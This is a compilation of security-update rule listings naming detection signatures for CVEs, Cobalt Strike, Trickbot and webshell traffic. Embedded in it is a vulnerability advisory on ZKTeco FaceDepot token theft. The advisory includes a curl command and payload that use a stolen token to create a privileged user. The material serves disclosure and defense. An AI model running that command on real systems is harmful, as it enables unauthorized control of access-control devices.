All Vulnerabilities

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Asterisk Manager Interface (AMI) HTTP
1009148* - Asterisk HTTP Server Denial Of Service Vulnerability (CVE-2018-7287)


Directory Server LDAP
1010895 - OpenLDAP Slapd CancelRequest Denial Of Service Vulnerability (CVE-2020-36227)


Web Application Common
1010899* - LightCMS Stored Cross-Site Scripting Vulnerability (CVE-2021-3355)
1010918 - Nagios XI Remote Code Execution Vulnerability (CVE-2020-35578)


Web Client Common
1010917 - Chromium Based Browsers Improper Input Validation Vulnerability (CVE-2021-21123)
1010910 - Chromium V8 Out-Of-Bounds Access Remote Code Execution Vulnerability (CVE-2021-21220)
1010922 - Google Chrome Out Of Bounds Write Vulnerability (CVE-2020-6507)
1010908 - Microsoft 3D Builder Remote Code Execution Vulnerability (ZDI-21-406)
1010907 - Microsoft Print 3D Remote Code Execution Vulnerability (ZDI-21-405)
1010924 - Microsoft Windows Remote Code Execution Vulnerability (CVE-2021-28468)
1010925 - XStream Library Arbitrary Code Execution Vulnerability (CVE-2021-21351)


Web Server Apache
1009087* - Apache Httpd FilesMatch Directive Security Restriction Bypass Vulnerability (CVE-2017-15715)


Web Server Common
1010902* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-26919)
1010905* - B2evolution CMS Open Redirect Vulnerability (CVE-2020-22840)


Web Server HTTPS
1010913* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26858)


Web Server Miscellaneous
1010916 - Atlassian Jira Information Disclosure Vulnerability (CVE-2019-3403)
1010893 - Jenkins 'Repository Connector' Plugin Stored Cross-Site Scripting Vulnerability (CVE-2021-21618)
1008763* - Red Hat JBoss Application Server 'doFilter' Insecure Deserialization Vulnerability (CVE-2017-12149)


Zoho ManageEngine
1010903 - Zoho ManageEngine Applications Manager Custom Monitor Type SQL Injection Vulnerability


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

1002831* - Unix - Syslog

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Asterisk Manager Interface (AMI) HTTP
1009148 - Asterisk HTTP Server Denial Of Service Vulnerability (CVE-2018-7287)


HP Intelligent Management Center (IMC)
1010889* - Apache OFBiz Unsafe Deserialization Vulnerability (CVE-2021-26295)


Mail Server Common
1010001* - Dovecot And Pigeonhole Remote Code Execution Vulnerability (CVE-2019-11500)


Microsoft Office
1010909 - Microsoft Excel Remote Code Execution Vulnerability (CVE-2021-28454)
1010914 - Microsoft Word Remote Code Execution Vulnerability (CVE-2021-28453)


Web Application Common
1010899 - LightCMS Stored Cross-Site Scripting Vulnerability (CVE-2021-3355)


Web Client Common
1010904 - Google Chrome Insufficient Data Validation Vulnerability (CVE-2020-16040)


Web Client Internet Explorer/Edge
1010857* - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)
1010912 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411) -1


Web Server Common
1010902 - Apache Druid Remote Code Execution Vulnerability (CVE-2021-26919)
1010905 - B2evolution CMS Open Redirect Vulnerability (CVE-2020-22840)
1010892* - B2evolution CMS Reflected Cross Site Scripting Vulnerability (CVE-2020-22839)
1010885* - CMS Made Simple Smarty Server-side Template Injection Vulnerability (CVE-2021-26120)


Web Server HTTPS
1010913 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26858)


Integrity Monitoring Rules:

1006683* - TMTR-0016: Suspicious Running Processes Detected


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DCERPC Services
1010900 - Microsoft Windows SMB Information Disclosure Vulnerability (CVE-2021-28325)


HP Intelligent Management Center (IMC)
1010889 - Apache OFBiz Unsafe Deserialization Vulnerability (CVE-2021-26295)


Suspicious Client Ransomware Activity
1010732* - Identified FlawedGrace Checkin Request - Client


Suspicious Server Ransomware Activity
1010733* - Identified FlawedGrace Checkin Request - Server


Web Application PHP Based
1010886* - Batflat CMS Remote Code Execution Vulnerability (CVE-2020-35734)


Web Application Tomcat
1009697* - Apache Tomcat Remote Code Execution Vulnerability (CVE-2019-0232)


Web Client Common
1010806* - Identified Directory Traversal Attack In HTTP Response Headers
1010898 - Microsoft Windows Win32k Elevation Of Privilege Vulnerability (CVE-2021-28310)


Web Client Internet Explorer/Edge
1010888 - Microsoft Edge Memory Corruption Vulnerability (CVE-2017-11799)
1010896 - Microsoft Edge Memory Corruption Vulnerability (CVE-2017-8755)


Web Server Common
1010892 - B2evolution CMS Reflected Cross Site Scripting Vulnerability (CVE-2020-22839)
1010885 - CMS Made Simple Smarty Server-side Template Injection Vulnerability (CVE-2021-26120)
1010871* - Cisco Data Center Network Manager Arbitrary File Upload Vulnerability (CVE-2019-1620)
1010874 - Identified Cisco Data Center Network Manager Authentication Bypass Attempt
1010891 - Identified Cisco Data Center Network Manager Information Disclosure Vulnerability (CVE-2019-1622)
1010755* - SAP Solution Manager Remote Code Execution Vulnerability (CVE-2020-6207)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

1002798* - Database Server - PostgreSQL

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DNS Client
1010784* - DNSmasq DNSSEC Out Of Bounds Write Vulnerability (CVE-2020-25687)


DNS Server
1010613* - Identified DNS Trojan.Win32.Trickbot.Dns Traffic


Suspicious Client Application Activity
1010741* - Identified HTTP Backdoor Python FreakOut A Runtime Detection


Suspicious Client Ransomware Activity
1010792* - Identified Cobalt Strike Default Self-signed SSL/TLS Certificate
1010597* - Identified HTTP Cobalt Strike Malleable C&C Traffic Response (Office 365 Calendar Profile)
1010596* - Identified HTTP Cobalt Strike Malleable C&C Traffic Response (YouTube Profile)
1010714* - Identified HTTP Trojan-Downloader.Win32.Cometer.bfc C&C Traffic Request
1010617* - Identified TLS Cobalt Strike Beacon (Certificate)


Suspicious Server Ransomware Activity
1010638* - Identified FTP Backdoor.Win32.Qbot.JINX Runtime Detection
1010616* - Identified HTTP Backdoor.Shell.Powertrick.A Runtime Detection
1010608* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Amazon Profile)
1010637* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Google Safe Browsing Profile)
1010609* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Office 365 Calendar Profile)
1010636* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Pandora GET Profile)
1010639* - Identified HTTP Cobalt Strike Malleable C&C Traffic Request (Pandora POST Profile)
1010731* - Identified HTTP Redhat Webshell C&C Traffic
1010614* - Identified HTTP Trickbot Data Exfiltration (Card Payment)
1010615* - Identified HTTP Trickbot Data Exfiltration (Network Module)
1010634* - Identified HTTP Trickbot Data Exfiltration - (Application Credentials Grabber)
1010644* - Identified HTTP Trojan-Downloader.Shell.Lightbot.A C&C Traffic Request
1010610* - Identified HTTP Trojan.Win64.BazarTrickbot Traffic
1010611* - Identified HTTP TrojanDownloader.Win64.BazarLoader Traffic
1010607* - Identified TCP Meterpreter Payload


Web Application PHP Based
1010886 - Batflat CMS Remote Code Execution Vulnerability (CVE-2020-35734)


Web Client Common
1010806 - Identified Directory Traversal Attack In HTTP Response Headers


Web Server Common
1010867* - Apache ActiveMQ Web Console Reflected Cross-Site Scripting Vulnerability (CVE-2020-13947)
1010871 - Cisco Data Center Network Manager Arbitrary File Upload Vulnerability (CVE-2019-1620)
1010734* - Identified BumbleBee Webshell Traffic Over HTTP
1010814 - Identified SAP Solution Manager Removal On Host Attempt (ATT&CK T1070.004)


Web Server HTTPS
1010868* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
1010870* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1
1010875* - rConfig 'vendor.crud.php' Arbitrary File Upload Vulnerability (CVE-2020-12255)


Web Server Oracle
1010887 - Identify Oracle Application Server Config Files Access


Windows SMB Server
1010884* - Microsoft Windows RPC Remote Code Execution Vulnerability (CVE-2017-8461)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Microsoft Office
1010879 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27053)
1010878 - Microsoft Excel XLS File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27054)
1010880 - Microsoft Office Graph Uninitialized Variable Remote Code Execution Vulnerability (CVE-2021-27057)
1010881 - Microsoft PowerPoint PPTX File Parsing Use-After-Free Remote Code Execution Vulnerability (CVE-2021-27056)


Oracle E-Business Suite Web Interface
1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


Web Server Common
1010796* - Apache Druid Remote Code Execution Vulnerability (CVE-2021-25646)


Web Server HTTPS
1010868 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
1010870 - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1


Web Server Nagios
1010866* - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


Web Server Oracle
1010590* - Oracle WebLogic Server Remote Code Execution Vulnerabilities (CVE-2020-14882, CVE-2020-14750 and CVE-2020-14883)


Web Server SharePoint
1010823 - Identified Microsoft SharePoint GetPermissionCollection Request (ATT&CK T1069, T1087, T1213.002, T1589.002, T1589.003)
1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DNS Client
1010766* - Identified Non Existing DNS Resource Record (RR) Types In DNS Traffic


DNS Server
1010863* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
1010865* - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


Oracle E-Business Suite Web Interface
1010730 - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


SSL Client
1010410* - OpenSSL Large DH Parameter Denial Of Service Vulnerability (CVE-2018-0732)


Suspicious Server Ransomware Activity
1010647* - Identified HTTP Backdoor.Win32.Cobalt.SMHP C&C Traffic Request


Web Application PHP Based
1010852* - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


Web Server Common
1010862* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
1010858* - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


Web Server HTTPS
1010849 - Identified Zoom WebSocket Upgrade Request
1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)


Web Server Miscellaneous
1010682* - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


Web Server Nagios
1010866 - Nagios XI Cross Site Scripting Vulnerability (CVE-2021-25299)


Web Server SharePoint
1010864* - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


Windows SMB Server
1007065* - Executable File Uploaded On Network Share (ATT&CK T1105)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Oracle E-Business Suite Web Interface
1010730* - Oracle E-Business Suite 'ozfVendorLov' SQL Injection Information Disclosure Vulnerability (CVE-2020-14876)


Web Client Common
1010877 - Adobe Acrobat And Reader Multiple Security Vulnerabilities (APSB21-09) - 4


Web Client HTTPS
1010132* - Microsoft Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601) - 1


Web Server Common
1010867 - Apache ActiveMQ Web Console Reflected Cross-Site Scripting Vulnerability (CVE-2020-13947)


Web Server HTTPS
1010868* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065)
1010870* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-27065) - 1
1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972 and CVE-2021-21973)
1010875 - rConfig 'vendor.crud.php' Arbitrary File Upload Vulnerability (CVE-2020-12255)


Windows SMB Server
1010884 - Microsoft Windows RPC Remote Code Execution Vulnerability (CVE-2017-8461)


Integrity Monitoring Rules:

1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

Lack of mutual authentication in ZKTeco FaceDepot 7B 1.0.213 and ZKBiosecurity Server 1.0.0_20190723 allows an attacker to obtain a long-lasting token by impersonating the server.

The vulnerability has been submitted to ZDI on Dec 3, 2019.

ZDI got one response from the vendor which acknowledged but not confirmed the vulnerability. The responsible disclosure expired on April 30, 2020.

The vendor addressed the vulnerability and has recommended to install an updated version of the software. The update can be found via the vendor's link:

• ZKBioSecurityV5000 3.1.1 R

Details

The researchers have tried two ways to successfully steal the access token in the HTTP header.

1. Use a Python script (zkteco.py, see below) and a self-signed SSL certificate to simulate ZKBiosecurity Server (ADMS) and do ARP spoofing on HTTPS port 8088.
2. Wireshark the default deployment, which does HTTP instead of HTTPS.

We found no CSRF to prevent such attack. Moreover, the token has a long life (at least 2 weeks), and is still valid even after FaceDepot 7B (the Android tablet) issues a new token. The token can be used in replay attack, command forgery, arbitrary user addition and privilege escalation (CVE-2020-17474).

We wrote a proof-of-concept to simulate ZKBiosecurity ADMS with reasonably dummy response. The SSL certificate is self-signed. We did not install the CA into the tablet. After taking over ZKBiosecurity Server's IP by arpspoofing, the script is able to obtain the token for further use. FaceDepot tablet reconnects to the server every 2 - 3 minutes and thus automatically submits a legit token.

After SN and token are obtained, it is easy to, for example, create a user, by using cURL:

curl -v -L -X POST -A 'iClock Proxy/1.09' 'http://192.168.0.1:8088/iclock/cdata?SN=LSR1915060003&table=tabledata&tablename=user&count=1' \
    -b 'token=a72182ceb8e4695ea84300155953566d' -H 'Accept: application/push' -H 'Accept-Charset: UTF-8' -H 'Accept-Language: zh-CN' \
    -H 'Content-Type: application/push;charset=UTF-8' -H 'Content-Language: zh-CN' -d@bugoy.user.post

Where the content of bugoy.user.post is:

user uuid=	cardno=	pin=11111	password=	group=1	starttime=0 	endtime=0	name=Bugoy Test1	privilege=14	disable=0	verify=0

Vulnerability Type

• CWE-613: Insufficient Session Expiration
• CWE-295: Improper Certificate Validation

Attack Type

Remote

Impact Information Disclosure

true

Attack Vectors

An attacker who is able to sniff the network or arp-spoof with a fake server obtains a long-lasting token.

Mitigation

• Deploy a firewall in front of ZKBiosecurity Server and enforce allowed IP list and allowed MAC list.
• Deny all unlisted access.

Discoverer

Roel Reyes, Joey Costoya, Philippe Lin, Vincenzo Ciancaglini, Morton Swimmer

Reference

https://www.zkteco.com/en/product_detail/FaceDepot-7B.html

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

Web Server Miscellaneous
1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)


Integrity Monitoring Rules:

There are no new or updated Integrity Monitoring Rules in this Security Update.


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.

* indicates a new version of an existing rule

Deep Packet Inspection Rules:

DNS Server
1010863 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26877)
1010865 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (CVE-2021-26897)


Directory Server LDAP
1010820* - OpenLDAP Slapd SASL Proxy Authorization Denial Of Service Vulnerability (CVE-2020-36222)


SolarWinds Orion Platform
1010810* - SolarWinds Orion Platform Insecure Deserialization Vulnerability (CVE-2021-25274)


Web Application Common
1010818* - WordPress 'Code Snippets' Plugin Cross-Site Request Forgery Vulnerability (CVE-2020-8417)


Web Application PHP Based
1010852 - phpMyAdmin 'SearchController' SQL Injection Vulnerability (CVE-2020-26935)


Web Client Common
1010861 - Microsoft Windows Graphics Component Remote Code Execution Vulnerability (CVE-2021-24093)


Web Client Internet Explorer/Edge
1010857 - Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2021-26411)


Web Server Common
1010801* - FCKeditor Plugin Arbitrary File Upload Vulnerability (CVE-2009-2265)
1010862 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282)
1010858 - SaltStack Salt Directory Traversal Vulnerability (CVE-2021-25282) - 1


Web Server HTTPS
1010854* - Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
1010850* - VMware vCenter Server Remote Code Execution Vulnerability (CVE-2021-21972)


Web Server Miscellaneous
1010496* - Apache Struts2 File Upload Denial of Service Vulnerability (CVE-2019-0233)
1010461* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2019-0230)
1010670* - Apache Struts2 Remote Code Execution Vulnerability (CVE-2020-17530)
1010682 - SolarWinds Orion Platform 'SaveUserSetting' Privilege Escalation Vulnerability (CVE-2021-27258)


Web Server Oracle
1010851 - Identified Oracle Application Server 'OWA_UTIL PL/SQL' Package Access


Web Server SharePoint
1010836 - Identified Microsoft SharePoint GetGroupCollection Request (ATT&CK T1589, T1213.002, T1087)
1010835 - Identified Microsoft SharePoint GetGroupCollectionFromRole Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010834 - Identified Microsoft SharePoint GetGroupCollectionFromSite Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010833 - Identified Microsoft SharePoint GetGroupCollectionFromUser Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010832 - Identified Microsoft SharePoint GetGroupCollectionFromWeb Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010831 - Identified Microsoft SharePoint GetGroupInfo Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010830 - Identified Microsoft SharePoint GetRoleCollection Request (ATT&CK T1589, T1213.002, T1087, T1069)
1010864 - Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2021-27076)


Zoho ManageEngine
1010811* - Zoho ManageEngine Applications Manager SQL Injection Vulnerability (CVE-2020-35765)


Integrity Monitoring Rules:

1010855* - Microsoft Exchange - HAFNIUM Targeted Vulnerabilities


Log Inspection Rules:

There are no new or updated Log Inspection Rules in this Security Update.